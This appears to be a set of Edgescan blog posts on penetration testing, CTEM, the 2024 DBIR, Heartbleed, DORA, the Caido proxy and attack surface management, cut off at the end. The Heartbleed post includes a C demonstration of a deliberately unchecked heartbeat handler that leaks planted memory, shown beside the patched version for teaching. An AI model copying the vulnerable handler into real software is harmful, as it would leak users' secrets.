In today's threat-filled digital landscape, organizations face relentless assaults from attackers seeking to exploit any weakness to breach networks, steal data, disrupt operations and more. One of the most effective ways to harden cyber defenses is to identify and address vulnerabilities before criminals can exploit them. This is where penetration testing comes into play.

As a crucial piece of any vulnerability management program, penetration testing, or "pen testing", is the practice of simulating real-world cyberattacks to evaluate the security of an organization's systems and networks. It involves authorized security professionals (ethical hackers) using the same tools and techniques that malicious attackers employ to breach defenses and gain unauthorized access. The clear difference is that pen testing is done with the permission of the organization, in a controlled manner, to help the organization rather than harm it.

The main objective of a pen test is to uncover as many security weaknesses as possible so they can be remediated before real attackers can exploit them. This includes identifying vulnerabilities such as software flaws, misconfigurations, weak passwords and logic errors. By thoroughly assessing systems with an adversarial mindset, expert pen testers provide an in-depth evaluation of an organization's attack surface and of the effectiveness of the security measures in place. With this in mind, pen testing alone cannot keep organizations in the know day in and day out.
Automated vulnerability scanning tools can identify known security flaws quickly and consistently, but they cannot replace manual testing performed by skilled human experts. While scanning has its place in the vulnerability management program, it only scratches the surface. It may not detect more subtle issues in custom applications or unique system architectures. Scanners can only identify documented vulnerability patterns and cannot detect complex multi-step attack chains or business logic flaws; these require creative, out-of-the-box thinking. It is crucial to have both automated scanning and expert manual testing to ensure proper security measures are in place.

Hands-on-keyboard assessments performed by experienced pen testers are vital in the effort to harden defenses. Skilled testers go beyond just running tools: they probe systems inquisitively, using their deep knowledge of attack techniques and experience with myriad technologies. They experiment, adapt and follow hunches to uncover hidden weaknesses that a scanner would never see.

As an example, imagine pen testing a large custom-built web application. A scanner might check for SQL injection on login fields or look for known vulnerable JavaScript libraries. A human tester will explore every input field, test for access control issues, analyze the logic to find ways to bypass workflows, manipulate APIs in unexpected ways and chain multiple small bugs together, relentlessly hunting for any crack in the armor.

Another key benefit of manual pen testing is the ability to provide in-depth context around findings. A scanner reports a vulnerability, but a skilled tester can demonstrate how it could be exploited, gauge the potential impact and provide remediation advice tailored to the specific organization and its technology stack.
This extra insight helps companies prioritize their efforts effectively, based on tangible risk.

Real-world critical vulnerability data from Edgescan's 2024 Vulnerability Statistics report highlights the importance of thorough manual testing:

- CVE-2023-28252, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) driver, was exploited in the wild to distribute Nokoyawa ransomware. The missing patch itself is exactly what host scanning catches; what automation alone cannot show is whether an attacker can reach a vulnerable host from a realistic foothold and chain that privilege escalation into wider compromise, which is where manual testing earns its place.
- Malicious file upload vulnerabilities accounted for 7.25% of all high and critical severity issues found by Edgescan in 2023. While often overlooked, these flaws can enable attackers to deliver ransomware and malware or establish footholds for further compromise. Detecting malicious file upload issues is straightforward for skilled manual testers but is frequently missed by automated scans.

Of course, manual pen testing takes more time, effort and budget than automated scanning. Expertise is required, and the scope of each assessment must be carefully outlined. But the fact remains: in-depth, expert-led assessments are a necessary investment for organizations serious about security.

Pen testing frequency depends on factors like organization size, compliance mandates and risk tolerance, but an annual assessment is regarded as a baseline by regulators, underwriters and practitioners alike. Even so, we all understand that no defense is impenetrable and new threats constantly emerge. A proactive, well-informed defense is crucial in a world where cybercrime is ever-present.
Hands-on penetration testing is one of the most powerful tools available to bolster an organization's resilience in the face of determined adversaries. By viewing systems through the eyes of an attacker, and identifying and closing gaps before criminals exploit them, companies can reduce cyber risk, protect valuable assets and operate with greater confidence.

How Edgescan Approaches Pen Testing

At Edgescan, we strongly believe in the significance of human expertise in pen testing. This is why our pen testers are highly experienced security professionals, not junior analysts or anonymous crowd-sourced researchers. Our testers hold certifications such as OSCP and CREST, and they have been with the company for an average of 7 years. We invest heavily in continuous training to ensure their skills remain current.

When you get a pen test from Edgescan, you can be confident it's a thorough, "hands-on-keyboard" assessment conducted by seasoned experts who look deeply for flaws, not just a dressed-up automated scan. We back this up with rigorous operational practices: as an ISO 27001 certified company, we handle your data and access your systems responsibly.

Our pen test services integrate with Edgescan's vulnerability management platform. This enables customers to get periodic in-depth pen testing and maintain continuous visibility of their security posture via automated scanning, dashboards and reports. It's a holistic solution for proactive cyber defence.

Don't settle for a "pen test" that's little more than a fancy scan from a vendor who can't actually deliver human expertise. And don't rely on occasional check-the-box assessments that leave you exposed in between. Partner with Edgescan for real, comprehensive pen testing conducted by experts, integrated with scanning and risk management capabilities.

### Continuous Threat Exposure Management (CTEM): What is it?
#### Is Edgescan CTEM?

When you look at Edgescan as a platform, we've been delivering CTEM for many, many years, since before Gartner coined the phrase in 2022.

#### What is CTEM/TEM?

- Deliver Scope for Cybersecurity Exposure: Investigate an organization's "Attack Surface" (vulnerable entry points and exposures) and discover assets.
- Improve Security Posture: By continuously monitoring, assessing, prioritizing, and resolving security issues, CTEM helps organizations improve their security posture and use their resources efficiently.
- Prioritize Threats: The goal of any robust TEM process is not to fix every single security issue discovered. Everyone has a vulnerability backlog, and we need to fix what has a decent probability of leading to a breach.
- Validate how a successful exploit might work: Confirm whether an attacker could actually exploit a vulnerability and what the impact might be. Provide a working example that explains the issue to non-cyber team members and executives.

The above is not rocket science, and I question if this actually warrants an acronym TBH... :)

#### Edgescan's Evolution (CTEM before CTEM was a "thing")

Vulnerability Detection:

We started with RBVM (Risk Based Vulnerability Management) in 2016, which consisted of automated DAST and device security scanning combined with cyber analytics and expert human validation for high and critical severity vulnerabilities. We have tested hundreds of thousands of assets to date with this SaaS, delivering validated vulnerability data and saving our clients time and money.

In 2020, we started using our Data Lake of 15,000,000 vulnerability data signatures. Given that it was all validated manually, the accuracy lent itself well to an analytics model, which is used to verify the probability that a discovered vulnerability is real: an additional level of validation to help ensure accuracy.

In 2021, we deployed a Single-Page Application (SPA) scanning feature to parse JavaScript and dynamic hrefs, which many scanners miss. We also deployed API scanning technology, which consumes API descriptors to cover the API endpoints' attack surface properly.

In 2022, we deployed dynamic mapping to CISA KEV and EPSS to provide additional ways to prioritize vulnerabilities. In 2023, we delivered EXF (Edgescan eXposure Factor), combining traditional severity ratings like OWASP and CVSS with EPSS and CISA KEV to provide even more actionable insight into what to prioritize.

Attack Surface Management:

2017: We deployed "Continuous Asset Profiling," now called ASM (Attack Surface Management), a term coined by Gartner in 2021. This evolved from continuous profiling of named IP ranges for exposures, services, and ports to EASM (External ASM), which crawls the internet and discovers IPs, APIs, subdomains, certificate health and defensive HTTP headers, and performs brute forcing, to name a few features. More here: https://edgescanstage.wpengine.com/asm-done-right/

Penetration Testing (as a Service): PTaaS

In 2018, we deployed "Edgescan Advanced" to provide depth of testing. It was designed to discover vulnerabilities that automation has difficulty with by combining both automation and human expertise. We currently have one of Europe's largest penetration testing teams, delivering this service at a massive scale. The mantra was "Automate the shite out of everything as long as accuracy and coverage do not suffer". This has worked, and Edgescan delivers (as of last month, April 2024) 160+ penetration tests every month via the platform. Testing is CREST Pentest compliant, using a team of OSCP and CEH experts. We deliver this globally, combined with the above ASM and RBVM on demand via the Edgescan platform.

Situational Awareness & Integrations:

Alerting, Events & SOAR (Security Orchestration, Automation and Response) is a solution stack of compatible software programs that allows an organization to collect data about security threats from multiple sources and respond to low-level security events without human involvement and in real time. Edgescan enables SOAR in many ways:

- Vulnerability Discovery/Closure/Event Alerting
- EASM/ASM Asset Event Alerting
- API Discovery
- Internal mitigation SLA alerts (vulnerability age alerts)
- And much more: https://edgescanstage.wpengine.com/integrations/

Once a vulnerability is discovered, it undergoes validation and risk rating to help ensure it is accurate and detailed enough to guide DevSecOps/Admin staff to mitigate the risk. "Edgescan Events" provide alerting to named members of staff or dedicated channels.

Artificial Intelligence:

We can't talk about our Black Ops development team and what they are working on. But be assured, it's very, very cool and will provide real value to our clients (as opposed to us).

#### Conclusion

So regarding CTEM/TEM, yes, Edgescan is and has been a CTEM solution (with ASM) even before analysts coined the phrase. I thought it was best to point this out in a "room full of many loud voices."

### Edgescan and the Verizon DBiR

It is that time of the year again when Verizon Business releases its world-renowned Data Breach Incidence Report (DBiR). As in previous years, it discusses the avenues for breach and has some commentary on trends within the industry. For the fourth year in a row, Edgescan was invited to submit data to the research, and we did.
We shared thousands of validated vulnerabilities based on the previous 12 months of delivering Penetration Testing as a Service and Risk-Based Vulnerability Management assessments to over 250 organizations globally across multiple verticals. Looking at the 2024 report, some key points resonate.

#### 25-year-old vulnerabilities are still a serious problem

The report cited substantial growth in attacks involving the exploitation of vulnerabilities as the critical path to initiate a breach compared to previous years. They increased by 180% from last year due to widespread vulnerabilities such as MOVEit and similar zero-day vulnerabilities.

The MOVEit vulnerability (CVE-2023-34362) affected at least 122 organizations and exposed the data of roughly 15 million people. It was, in effect, a SQL injection attack. It's worth remembering that SQL Injection (SQLI) was discovered in 1998. So, we are still dealing with 25-year-old vulnerabilities, which does not bode well for the cybersecurity and development industry.

SQLI was also the most common critical severity vulnerability discovered by Edgescan, per the 2024 Edgescan Vulnerability Statistics Report.

Fig. 1

One must consider, with all the new approaches to application & cloud security (CTEM, BAS, ETM, CRQ, ASPM, CCA, IAST, TBPT, CAASM, CWAP etc., not forgetting AI-based coding and assessment solutions), that the dial has not moved very much. I believe the industry is moving "ahead" while ignoring the problem.

Once breached, such attacks were primarily leveraged by Ransomware and other Extortion-related threat actors. As one might imagine, web applications were the main vector for those initial entry points. So we need to think about two things here:

- Weaknesses in web applications (and software in general) are the avenue of attack for Ransomware and extortion actors. Ensuring systems are secure makes this job harder for the attacker. A SQL injection can not only be used to "dump" databases but also as a foothold for a Ransomware attack.
- The initial vector may well be phishing, credential stealing, or credential-based attacks, but once in, pivoting is made much easier via unpatched CVEs and software vulnerabilities.

#### Artificial General Intelligence (AGI) threat landscape is nonexistent

To paraphrase the report, the folks at Verizon concluded that "after performing text analysis of criminal forums data contributors, we could obviously see the interest in GenAI (as in any other forum, really), but the number of mentions of GenAI terms alongside traditional attack types and vectors such as 'phishing,' 'malware,' 'vulnerability' and 'ransomware' were extremely low, circa 100 cumulative mentions over the past two years." One would assume that cybercriminals are ahead of the curve in terms of techniques and approaches to exploit and breach. Obviously, we are not there yet regarding the threat of "Evil AI", but I'm sure the day will come.

#### The top "Action Vectors" in breaches are Web Applications

The report cites stolen credentials as a significant avenue of attack. Given that credentials are used with web applications, they go hand in hand with the use of stolen credentials and the exploitation of vulnerabilities to infiltrate defences.

#### MTTR: Fixing code and Patching

The report discusses "survival analysis of CISA KEV vulnerabilities." It refers to CISA and claims to have found that it takes around 55 days to remediate 50% of critical vulnerabilities once their patches are available. Patching and mitigation generally do not occur in force until after the 30-day mark, and 12 months later, around 8% of CISA KEV vulnerabilities are still open.

At Edgescan, we find delivering both CISA KEV and EPSS metadata is important in terms of prioritization. In my opinion, the days of CVSS-based priority are numbered. In summary, the DBiR states "if it's in the KEV, fix ASAP."

#### Web applications a favorite for Ransomware

In terms of "ways in," web applications are second to "direct install" attacks, which leverage existing backdoors. This is followed by email attacks. Ransomware accounts for a large 11% of all incidents across 92% of industry verticals, which gives rise to the value of web application security. The DBiR team predicts that we will continue to see zero-day vulnerabilities being widely leveraged by ransomware groups into the future. Think MOVEit or Log4Shell.

#### Basic web application attacks

"Threat actors continue to take advantage of assets with default, simplistic and easily guessable credentials via brute forcing them, buying them or reusing them from previous breaches." When discussing an assessment, it is recommended that the scope of testing include such techniques.

- 100% of attacks against web applications were from an external source.
- User credentials were the most common "trophy" from a web application attack.
- 13% of breaches involved exploiting a vulnerability in a web application.
- "The Financial and Insurance (18%); Information (14%); and Professional, Scientific and Technical Services (13%) industries make up the top three verticals affected by Basic Web Application Attacks."

#### Conclusion

- Poor authentication mechanisms and weak passwords are very common vectors of a successful breach. Consider a strong password policy and multifactor authentication controls.
- Web application security is an underrated asset when it comes to defense against Ransomware.
- CISA KEV is a key indicator of what needs to be fixed ASAP. Old vulnerabilities still produce the most "bang for the buck."
- AGI (Artificial General Intelligence) is not a clear and present danger yet!! But its day will come. Focus on the basics.
### Heartbleed: 10 Years of Heartache

Ten years ago, the Heartbleed vulnerability (CVE-2014-0160) was publicly disclosed, revealing a critical flaw in OpenSSL versions 1.0.1 to 1.0.1f, a widely used cryptography library. OpenSSL is used as the basis for TLS in many Linux-based operating systems such as Ubuntu, Fedora, CentOS, OpenSUSE, and more. Open source web servers like Apache and nginx, email servers, chat servers and VPNs all used OpenSSL as well (The Heartbleed Bug).

#### What did Heartbleed affect?

The Heartbleed vulnerability affects two legs of the CIA triad, namely confidentiality and integrity. At the time of its disclosure, about 17% of the Internet's secure web servers were believed to be vulnerable to Heartbleed. More servers than this used OpenSSL; some were simply running older versions of OpenSSL that were not vulnerable. Windows servers use Schannel SSP instead of OpenSSL for their TLS/DTLS. However, just because you were running Windows servers did not mean that you got to breathe a sigh of relief. Load balancers, proxies, WAFs, VPNs, firewalls, etc. in many networks were also using OpenSSL.

#### Heartbeat Extension

Heartbleed allows attackers to extract sensitive data from memory, posing significant risks to millions of websites and their users. In the case of Heartbleed, the TLS/DTLS encryption itself didn't fail. The "heart" in Heartbleed refers to the heartbeat extension (RFC6520), which periodically sends heartbeat messages between a client and a server to maintain a session. The Heartbeat Extension is where the Heartbleed vulnerability was discovered.

A heartbeat is a message sent to a web server; it resets a session timer and causes the server to respond to the client with an identical message. Between heartbeats, the message lives in server memory, which gets overwritten after every heartbeat. A heartbeat message can be any length up to 64 KB. The first part of a heartbeat message states how large the message is. The second part is the message itself.

#### How It Works

"HeartBleed resulted from a missing bounds check before a memcpy() call that used non-sanitized user input as the length parameter in the Heartbeat extension implemented in OpenSSL." (OWASP) In plain English, the Heartbleed vulnerability takes advantage of a missing bounds check: the attacker specifies the length of a heartbeat message, and the Heartbeat extension never checks how large the message actually is. The server allocates 64 KB of memory based on the claimed size of the heartbeat, but the actual message is much smaller. The server repeats the message back and then leaks whatever the previous program left behind in memory to fill up the rest of the 64 KB. While 64 KB of data is not a lot, these attacks could essentially be launched continuously and with no way of being detected, making the flaw extremely dangerous in the wrong hands. The memory dumps could include program code, credentials, PII or just noise. Since Heartbleed affects an encryption protocol, much of the information dumped was primary key material.

#### Mini Case Study

An Edgescan client was convinced that Heartbleed would not affect them, because they used Windows servers across their organization. Edgescan leveraged a firewall using OpenSSL 1.0.1 that sat in front of one of their Microsoft servers to exploit Heartbleed. After memory dumping the client's mail server, we found a vacation request form that the skeptic had submitted earlier that day. After we asked our skeptical stakeholder about the vacation request he submitted at 10:47 AM that morning, he understood the severity of HeartBleed immediately.

#### Technical Fixes and Long-Term Solutions

The remedy involved updating OpenSSL to version 1.0.1g, which fixed the vulnerability, or recompiling OpenSSL with specific options to remove the vulnerable code. Heartbleed is untraceable and, in many cases, Heartbleed memory dumps contained primary and secondary key materials.
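The missing bounds check described under "How It Works", and the check that the 1.0.1g fix added, as an added example (not OpenSSL's code): a simplified heartbeat handler in its vulnerable and patched forms, run over a constructed in-process "memory arena" so the over-read stays well-defined. The arena, the planted stale data and all function names are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING 16      /* RFC 6520: a heartbeat carries at least 16 bytes of padding */
#define ARENA_SIZE 4096

/* Constructed stand-in for server memory: the incoming record is written at
 * the front, and whatever an earlier request left behind follows it. Keeping
 * the over-read inside this one array keeps the demo well-defined. */
unsigned char arena[ARENA_SIZE];

/* Plant data "left behind" by a previous connection at a given offset. */
void plant_stale_data(size_t offset, const char *text) {
    memcpy(arena + offset, text, strlen(text));
}

/* Write a heartbeat request into the arena. actual_len is what the client
 * really sent; claimed_len is what the 16-bit length field says. Returns the
 * true record length (what OpenSSL's s->s3->rrec.length would hold). */
size_t build_heartbeat(const unsigned char *payload, size_t actual_len, uint16_t claimed_len) {
    arena[0] = TLS1_HB_REQUEST;
    arena[1] = (unsigned char)(claimed_len >> 8);
    arena[2] = (unsigned char)(claimed_len & 0xff);
    memcpy(arena + 3, payload, actual_len);
    memset(arena + 3 + actual_len, 0, HB_PADDING);
    return 3 + actual_len + HB_PADDING;
}

/* Vulnerable handler, reconstructed from the description above: the payload
 * length is taken from the message and handed to memcpy() without ever being
 * compared with the size of the record that actually arrived. */
int heartbeat_vulnerable(const unsigned char *rec, size_t rec_len,
                         unsigned char *out, size_t *out_len) {
    const unsigned char *p = rec;
    unsigned int hbtype = *p++;
    unsigned int payload = ((unsigned int)p[0] << 8) | p[1];
    p += 2;
    (void)rec_len;                           /* never consulted: that is the bug */
    if (hbtype != TLS1_HB_REQUEST) return -1;
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (unsigned char)(payload >> 8);
    out[2] = (unsigned char)(payload & 0xff);
    memcpy(out + 3, p, payload);             /* copies past the end of the record */
    memset(out + 3 + payload, 0, HB_PADDING);
    *out_len = 3 + payload + HB_PADDING;
    return 0;
}

/* Patched handler: discard any record shorter than the length it claims,
 * which is the bounds check that OpenSSL 1.0.1g added. */
int heartbeat_patched(const unsigned char *rec, size_t rec_len,
                      unsigned char *out, size_t *out_len) {
    if (rec_len < 1 + 2 + HB_PADDING) return -1;       /* too short to be a heartbeat */
    const unsigned char *p = rec;
    unsigned int hbtype = *p++;
    unsigned int payload = ((unsigned int)p[0] << 8) | p[1];
    p += 2;
    if (hbtype != TLS1_HB_REQUEST) return -1;
    if (1 + 2 + payload + HB_PADDING > rec_len) return -1; /* claimed length exceeds record */
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (unsigned char)(payload >> 8);
    out[2] = (unsigned char)(payload & 0xff);
    memcpy(out + 3, p, payload);             /* now provably within the record */
    memset(out + 3 + payload, 0, HB_PADDING);
    *out_len = 3 + payload + HB_PADDING;
    return 0;
}

/* Does a response contain bytes that were never part of the request? */
int response_leaks(const unsigned char *out, size_t out_len, const char *text) {
    size_t n = strlen(text);
    for (size_t i = 0; i + n <= out_len; i++)
        if (memcmp(out + i, text, n) == 0) return 1;
    return 0;
}

/* Feed the same malformed request (4 bytes sent, 1024 claimed) to both
 * handlers. Returns 1 when the vulnerable one leaks the planted data and
 * the patched one rejects the record. */
int demo(void) {
    static unsigned char out[ARENA_SIZE + 3 + HB_PADDING];
    const unsigned char payload[] = "ping";
    const char *stale = "session=deadbeef; user=alice";   /* constructed leftover */
    size_t out_len = 0;

    memset(arena, 0, sizeof arena);
    plant_stale_data(512, stale);
    size_t rec_len = build_heartbeat(payload, 4, 1024);  /* keep claimed < ARENA_SIZE */

    int leaked = heartbeat_vulnerable(arena, rec_len, out, &out_len) == 0
              && response_leaks(out, out_len, stale);
    int rc = heartbeat_patched(arena, rec_len, out, &out_len);
    printf("vulnerable handler leaked stale data: %s; patched handler rc=%d\n",
           leaked ? "yes" : "no", rc);
    return leaked && rc == -1;
}

int main(void) { return demo() ? 0 : 1; }
```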
Organizations had to perform remediation under the assumption that primary and secondary key materials had been dumped, because there was no way to tell whether this was the case. That meant revoking certificates and contacting your Certificate Authority (CA) to reissue certificates, and resetting login credentials, among other steps.

#### Impact and Response

Once news about HeartBleed spread, affected websites were urged to update their software and renew their security certificates. Subsequent analyses showed that many websites were slow to respond, with some servers remaining vulnerable for years after the patch was released. While this may seem hard to believe, currently 55% of vulnerabilities with a CVSS score greater than seven are between 1 and 4 years old (Edgescan 2024 Stats Report). There are also around 34,000 devices in the United States that are still vulnerable to Heartbleed (Understanding SSL by Country).

#### Conclusion

Heartbleed highlights the continued importance of supporting open-source infrastructure initiatives. OpenSSL remains one of the most widely used open-source cryptography libraries and highlights the necessity of maintaining open-source tools and libraries, namely because they are so widely used that a single vulnerability affects a mindboggling myriad of different software deployed in the wild. Heartbleed led to the Core Infrastructure Initiative, which aimed to fund and support essential open-source projects to prevent similar vulnerabilities in popular open-source projects.

Popular open-source libraries such as OpenSSL continue to experience particularly devastating zero-day vulnerabilities; another standout example is Log4J. OpenSSL was severely underfunded, running off about $2,000 in donations a year and only one full-time employee (Tech giants, chastened by Heartbleed, finally agree to fund OpenSSL). Ten years later the lasting effects and lessons remain relevant. It's important that we continue to invest in open-source projects that ensure the security and resilience of the Internet infrastructure.

#### Citations

- The Heartbleed Bug: https://heartbleed.com/
- Edgescan 2024 Stats Report: https://edgescanstage.wpengine.com/intel-hub/stats-report/
- OWASP: https://owasp.org/www-community/vulnerabilities/Heartbleed_Bug
- Tech giants, chastened by Heartbleed, finally agree to fund OpenSSL: https://arstechnica.com/information-technology/2014/04/tech-giants-chastened-by-heartbleed-finally-agree-to-fund-openssl/
- Understanding SSL by Country: https://help.shodan.io/data-analysis/ssl-analysis-by-country

### Get Prepared for Digital Operational Resilience Act (DORA)

#### Introduction to DORA

The Digital Operational Resilience Act (DORA) was brought in across European Union nations to address risk management gaps and attempt to harmonise these requirements across the EU. The act specifically targets financial service entities, i.e. largely those regulated by central banks, and introduces rules around incident management & reporting, digital testing and management of third-party risk.

#### What is DORA?

The European Council adopted DORA in November 2022, and it will be in full force from 17th January 2025. DORA is an EU regulation that comprehensively addresses Information and Communication Technology (ICT) risk management in the financial sector by ensuring that all providers follow a set of standards to mitigate ICT risks for their operations. Prior to DORA, each EU country had different regulations for ICT risk. DORA aims to create a unified framework for all member states.
#### Who Does DORA Apply to?

DORA applies to financial entities and ICT third parties providing services to financial institutions, such as cloud platforms or data analytics; DORA does not only apply to traditional banks. Affected entities include traditional financial institutions, credit and payment institutions, investment firms & funds, crypto-asset providers, data reporting service providers, insurance companies and ancillary service providers, pensions providers, auditors and some ICT third-party service providers.

#### Key Elements of DORA

There are five crucial elements of DORA, which can be broken down as follows:

- ICT Risk Management
- ICT-related Incident Management, Classification, and Reporting
- Digital Operational Resilience Testing
- Managing of ICT Third-party Risk
- Information Sharing Arrangements

#### DORA Testing Requirements

Digital Operational Resilience Testing

As part of the ICT risk management framework, DORA requires that financial entities define, document, and maintain a thorough and comprehensive digital operational resilience testing programme. Financial entities will need to ensure that appropriate tests are conducted on all ICT systems and applications supporting critical or important functions on at least a yearly basis. Some of the tests detailed in the DORA regulation include:

- Vulnerability assessments and scans
- Open-source analyses
- Network security assessments
- Gap analyses
- Physical security reviews
- Questionnaires and scanning software solutions
- Source code reviews where feasible
- Scenario-based tests
- Compatibility testing
- Performance testing
- End-to-end testing or penetration testing
- Threat-Led Penetration Testing (see below)

What organisations will need to do to meet DORA requirements:

- Demonstrate that they are conducting an appropriate set of security testing on 'critical' systems and applications at least annually
- Fully address any vulnerabilities identified by this testing
- For designated significant entities (yet to be specified by a Regulatory Technical Standard (RTS)): conduct a Threat-Led Penetration Test (TLPT) at least once every three years

#### What is Threat-Led Penetration Testing (TLPT)?

In addition to the above types of testing, certain financial entities will be required to carry out Threat-Led Penetration Testing (TLPT) at least once every three years. TLPT is essentially red teaming based on threat intelligence and should cover at least the critical functions and services of a financial entity.

Threat intelligence refers to information such as tactics, techniques, and procedures (TTPs) employed by cybercriminals that helps an organization understand the cyber threats it faces. Red teaming is a cybersecurity practice where a team of ethical hackers simulates real-world cyber-attacks to evaluate an organization's security posture and identify vulnerabilities. Red Teaming is different from a penetration test, in that it is usually focused on a specific goal or objective.

For the lifecycle of a TLPT, the scope shall be determined by the financial entity itself and validated by the relevant competent authorities (EBA, ESMA, and EIOPA). Testing must be performed by a suitable testing organisation, and it must be performed in a live production environment. The methodology around conducting the TLPT will likely be based on the ECB's existing TIBER-EU framework.

#### What is TIBER-EU?

TIBER-EU is a European framework for conducting threat intelligence-based red-teaming tests, which was introduced in 2018. It outlines the TTPs that should be employed during testing, based on bespoke threat intelligence.

TIBER-EU brings together a number of entities within organisations themselves and outlines the third-party providers that are required to carry out the red-team capability and the threat intelligence capability. These providers work together with the organisation to conduct testing. The testing requirements mandated by TIBER-EU are clear, but it is unclear how they fit in with DORA.

#### What are the next significant milestones for DORA?

The European Supervisory Agencies (ESAs), along with other European authorities, are leading the development of the technical standards as required by the DORA Regulation. Further clarification on standards is expected to be published for public consultation in late Q3 2023 or early Q4 2023. The timelines for further clarification on exact requirements in relation to performing resilience testing are expected by late Q4 2023.

#### An Annual Penetration Test is a Requirement of DORA

The most significant requirement of DORA is the annual penetration testing for critical applications and systems, which can be fulfilled through the use of Edgescan.

#### Edgescan Penetration Testing Service Meets DORA Requirements

The good news is that most of the types of testing required by the standard are items that financial services organisations will be well familiar with and, indeed, the majority will already have ongoing security testing programmes that include these items. Once organisations identify their critical systems in scope, we can onboard them and start testing immediately. Edgescan offers world-class penetration testing services globally through our Penetration Testing as a Service (PTaaS) platform.

#### Testing, Reporting and Remediation!

Our testing methodology more than meets the current criteria to cover the annual tests that are outlined in the DORA specifications. Extensive and detailed reporting via the Edgescan platform gives you an ongoing view of the security posture of your critical assets, with extensive reporting metrics and on-demand retesting. Plus, with remediation advice direct from our technical testing teams, demonstrating that any vulnerabilities identified have been remediated sufficiently and retested satisfactorily will not be a problem.

#### Threat-Led Penetration Testing

Edgescan provides objective-based penetration testing (aka Red Teaming) capabilities using our CREST certified pen testers. The goal of standard penetration testing is to find 'all the vulnerabilities' that an adversary could leverage to breach a system or organisation. Red Teaming can be thought of as a narrow-scope penetration test, whereby you focus on an objective or end goal and leverage vulnerabilities to achieve this objective.

The exact requirements for the once-per-three-year TLPT are still being finalized. We will continue to monitor and provide updates via social media and blog posts as more clarity on testing becomes available. Contact us today to see how Edgescan can help you meet DORA requirements.

### Caido – A New Contender for Web Application Proxying?

#### Introduction

Web application proxy tools are ubiquitous in a penetration tester's toolkit, whether for testing a web, mobile, or desktop application. If the application sends network traffic over HTTP(S), a web application proxy will be used as part of the penetration test.
They come in multiple forms, from the widely popular Burp Suite and ZAP to the lesser known mitmproxy, Fiddler, or Charles proxies. All proxy tools have some ever-present functionality, such as the ability to intercept and manipulate traffic as it is sent, or to replay requests with altered values. Some proxies, like Burp Suite and ZAP, include the ability to perform automated testing against the application requests to help the tester identify vulnerabilities.

Recently a new tool has come onto the market. While it is still in beta, the tool, called Caido, is gaining popularity. Developed by a team of three, they state over 10,00 users at the time of writing and over 40 paid customers. They also have recently announced that Justin Gardner (@Rhynorater) and Ben Sadeghipour (@NahamSec), two well-known personalities in the bug bounty world, have joined the Caido development team as advisors.

Like other proxies, there are different pricing plans for using Caido. There are currently three plans available:

- The free plan, which restricts the amount of functionality you can access.
- The paid plan, costing $200 a year, which provides access to all functionality in the application.
- The team plan, which costs $30 per month per user, allows centralised management of Caido across a team and includes custom features.

While it is more of a traditional proxy, without the automated testing capabilities of Burp Suite or ZAP, there are a few features of Caido that are making it popular.

#### Installation

Caido can be installed straight from the website at https://caido.io; it can be installed and run on Windows, Linux, and macOS systems. There are two options for installation: a desktop application or a command-line interface (CLI). The desktop application is fully functional for Windows and macOS users but is currently experimental for Linux users, while the CLI version is available for all systems. These options for installation allow Caido to be run locally on a tester's system or hosted remotely on a server specified by the tester.

#### Features

##### Projects

Similar to other web application proxies, Caido allows users to create projects. However, unlike other proxies, these projects can be accessed at any time without restarting the proxy. They can be accessed from either the Workspace option at the bottom of the menu or at the top of the screen.

Figure 1

##### Built-in Browser

A recent feature in Caido, which other proxy tools such as Burp Suite or ZAP have long contained, is the ability to spawn a browser from within Caido. Currently, this only works for Chrome-based browsers. By selecting the Chrome symbol at the top of the screen, we are prompted to select the browser we want to open.

Figure 2

This will spawn an instance of the browser that is already proxied through Caido, with all the relevant certificates trusted.

Figure 3

##### Replay Collections

The Replay functionality in Caido works similarly to that found in other proxy tools; a request can be selected from the history and sent to Replay. However, in Caido there is the ability to create collections of requests.

Figure 4

This allows testers to have multiple different requests grouped together by application functionality or by the various tests they may be performing at a time, such as cross-site scripting or SQL injection.

##### Workflows

Workflows in Caido allow a tester to easily create an automated system that will perform actions depending on various states that Caido may encounter. For example, a tester could create a workflow that would run a locally installed tool if they encounter a certain hostname or URL in a website. Depending on the plan used, this functionality is limited. The free version can only create one passive workflow and five convert workflows (decode/encode base64, for example).

Figure 5

##### Assistant

Another useful piece of functionality for a tester is the Assistant, which is only available in paid plans. This allows us to ask certain questions about what we are testing to help us in our penetration test, such as why a cross-site scripting payload may not be working in a browser.

Figure 6

#### Conclusion

Caido is a new and up-and-coming web application proxy tool. It is being regularly updated by the development team and does have some useful functionality in it for a penetration tester. However, it has not reached its full potential yet. This will be a tool to watch, which could potentially join Burp Suite and ZAP as one of the go-to proxies for web application testing.

### ASM Done Right

#### What is ASM?

Attack Surface Management (ASM) provides you the ability to see all services exposed to the public internet across your global estate in real time. As new systems are deployed, decommissioned, or a system changes, ASM can inform you of the event. This is delivered in real time and on a continuous basis.

ASM is about visibility. "We can't secure what we can't see." Its purpose is to identify security blind spots and map all assets discovered in your global IT ecosystems. It continuously evaluates information in real time as new assets are deployed, decommissioned or as a system changes. Edgescan's ASM also checks for potentially unknown systems which may be relevant to you and are avenues for an attack against your organization. Some Edgescan features are:

Fig 1. EASM Investigation Stream

Brute-force subdomain enumeration uses a brute-force approach to guess potential subdomains of target domains. Why? Reducing attack surfaces: subdomain enumeration helps identify and map the subdomains associated with a domain name. By discovering these subdomains, security professionals can narrow down the scope of an organisation's landscape. Knowing which machines and resources are available allows for targeted assessments and reduces the preparatory work needed to locate and map the organization's infrastructure.
“Knowing what we have so we can secure our landscape”.Subdomain Enumeration is also designed to for detecting hidden applications which leads to additional vulnerability discovery.Last registrant exploration retrieves the last (most recent) registrant of a domain. Why?Understanding Ownership history. Security and trademark protection to help detect misuse or violation of intellectual property.Domain DNS resolution resolves the DNS records of a domain. Why?DNS resolution can assist with load balancing investigations, redundancy and failover and DNSSEC such as malware blocking, content filtering and global accessibility.Subdomain enumeration discovers subdomains of target domains by querying publicly available resources like search engines and social media. Why?Subdomain enumeration helps identify all subdomains associated with a domain. Cybersquatters spend time discovering additional targets beyond the main domain.Each subdomain potentially represents an opportunity for squatting. By enumerating subdomains, cybersquatters can find unknown applications or services that might be vulnerable or valuable for their purposes.Attackers may monetize or infect squatted subdomains through malware, ads, affiliate marketing, or selling them to the highest bidder. Subdomain enumeration helps them discover potential targets for such activities.Certificate retrieval and certificate health retrieves certificates for domains and reports their 